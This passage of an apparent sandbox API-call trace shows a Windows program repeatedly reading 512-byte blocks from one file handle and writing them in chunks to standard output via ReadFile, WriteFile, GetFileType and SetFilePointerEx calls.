(_FileHandle=1) returned 0x50 [0227.668] GetFileType (hFile=0x50) returned 0x1 [0227.668] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.669] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.669] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.669] GetFileType (hFile=0x50) returned 0x1 [0227.669] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.669] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.669] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.669] GetFileType (hFile=0x50) returned 0x1 [0227.669] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.669] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, 
lpOverlapped=0x0) returned 1 [0227.669] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.669] GetFileType (hFile=0x50) returned 0x1 [0227.669] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.669] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.669] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.669] GetFileType (hFile=0x50) returned 0x1 [0227.669] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.669] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.669] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.669] GetFileType (hFile=0x50) returned 0x1 [0227.670] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.670] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.670] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.670] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.670] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.670] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.670] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.670] GetFileType (hFile=0x50) returned 0x1 [0227.670] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.670] GetFileType (hFile=0x50) returned 0x1 [0227.670] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.670] WriteFile (in: hFile=0x50, 
lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.670] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.670] GetFileType (hFile=0x50) returned 0x1 [0227.670] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.670] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.670] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.670] GetFileType (hFile=0x50) returned 0x1 [0227.670] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.670] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.670] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.670] GetFileType (hFile=0x50) returned 0x1 [0227.670] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.670] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.671] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.671] GetFileType (hFile=0x50) returned 0x1 [0227.671] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.671] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.671] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.671] GetFileType (hFile=0x50) returned 0x1 [0227.671] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.671] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.671] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.671] GetFileType (hFile=0x50) returned 0x1 [0227.671] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.671] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.671] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.671] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.671] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.671] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.671] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.671] GetFileType (hFile=0x50) returned 0x1 [0227.671] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.671] GetFileType (hFile=0x50) returned 0x1 [0227.671] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.671] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.672] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.672] GetFileType (hFile=0x50) returned 0x1 [0227.672] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.672] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.672] _get_osfhandle (_FileHandle=1) returned 0x50 
[0227.672] GetFileType (hFile=0x50) returned 0x1 [0227.672] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.672] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.672] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.672] GetFileType (hFile=0x50) returned 0x1 [0227.672] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.672] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.672] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.672] GetFileType (hFile=0x50) returned 0x1 [0227.672] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.672] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.672] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.672] GetFileType (hFile=0x50) returned 0x1 [0227.672] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.672] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.673] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.673] GetFileType (hFile=0x50) returned 0x1 [0227.673] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.673] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.673] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.673] SetFilePointerEx (in: 
hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.673] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.673] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.673] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.673] GetFileType (hFile=0x50) returned 0x1 [0227.673] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.673] GetFileType (hFile=0x50) returned 0x1 [0227.673] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.673] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.673] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.673] GetFileType (hFile=0x50) returned 0x1 [0227.673] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.673] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.673] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.673] GetFileType (hFile=0x50) returned 0x1 [0227.673] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.673] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.674] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.674] GetFileType (hFile=0x50) returned 0x1 [0227.674] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.674] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: 
lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.674] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.674] GetFileType (hFile=0x50) returned 0x1 [0227.674] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.674] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.674] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.674] GetFileType (hFile=0x50) returned 0x1 [0227.674] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.674] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.674] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.674] GetFileType (hFile=0x50) returned 0x1 [0227.674] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.674] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.674] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.674] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.675] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.675] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.675] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.675] GetFileType (hFile=0x50) returned 0x1 [0227.675] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.675] GetFileType (hFile=0x50) returned 0x1 [0227.675] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0227.675] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.675] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.675] GetFileType (hFile=0x50) returned 0x1 [0227.675] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.675] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.675] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.675] GetFileType (hFile=0x50) returned 0x1 [0227.675] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.675] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.675] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.675] GetFileType (hFile=0x50) returned 0x1 [0227.675] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.675] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.676] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.676] GetFileType (hFile=0x50) returned 0x1 [0227.676] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.676] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.676] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.676] GetFileType (hFile=0x50) returned 0x1 [0227.676] _get_osfhandle (_FileHandle=1) returned 0x50 
[0227.676] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.676] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.676] GetFileType (hFile=0x50) returned 0x1 [0227.676] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.676] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.676] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.676] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.676] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.676] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.676] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.676] GetFileType (hFile=0x50) returned 0x1 [0227.676] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.676] GetFileType (hFile=0x50) returned 0x1 [0227.676] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.676] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.677] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.677] GetFileType (hFile=0x50) returned 0x1 [0227.677] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.677] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 
[0227.677] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.677] GetFileType (hFile=0x50) returned 0x1 [0227.677] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.677] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.677] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.677] GetFileType (hFile=0x50) returned 0x1 [0227.677] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.677] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.677] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.677] GetFileType (hFile=0x50) returned 0x1 [0227.677] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.677] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.677] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.677] GetFileType (hFile=0x50) returned 0x1 [0227.677] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.677] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.678] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.678] GetFileType (hFile=0x50) returned 0x1 [0227.678] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.678] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.678] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0227.678] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.678] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.678] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.678] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.678] GetFileType (hFile=0x50) returned 0x1 [0227.678] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.678] GetFileType (hFile=0x50) returned 0x1 [0227.678] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.678] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.678] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.678] GetFileType (hFile=0x50) returned 0x1 [0227.678] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.678] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.678] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.678] GetFileType (hFile=0x50) returned 0x1 [0227.678] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.679] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.679] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.679] GetFileType (hFile=0x50) returned 0x1 [0227.679] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.679] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.679] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.679] GetFileType (hFile=0x50) returned 0x1 [0227.679] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.679] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.679] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.679] GetFileType (hFile=0x50) returned 0x1 [0227.679] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.679] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.679] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.679] GetFileType (hFile=0x50) returned 0x1 [0227.679] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.679] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.679] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.679] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.680] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.680] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.680] GetFileType (hFile=0x50) returned 0x1 [0227.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.680] GetFileType 
(hFile=0x50) returned 0x1 [0227.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.680] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.680] GetFileType (hFile=0x50) returned 0x1 [0227.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.680] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.680] GetFileType (hFile=0x50) returned 0x1 [0227.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.680] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.680] GetFileType (hFile=0x50) returned 0x1 [0227.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.681] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.681] GetFileType (hFile=0x50) returned 0x1 [0227.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.681] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, 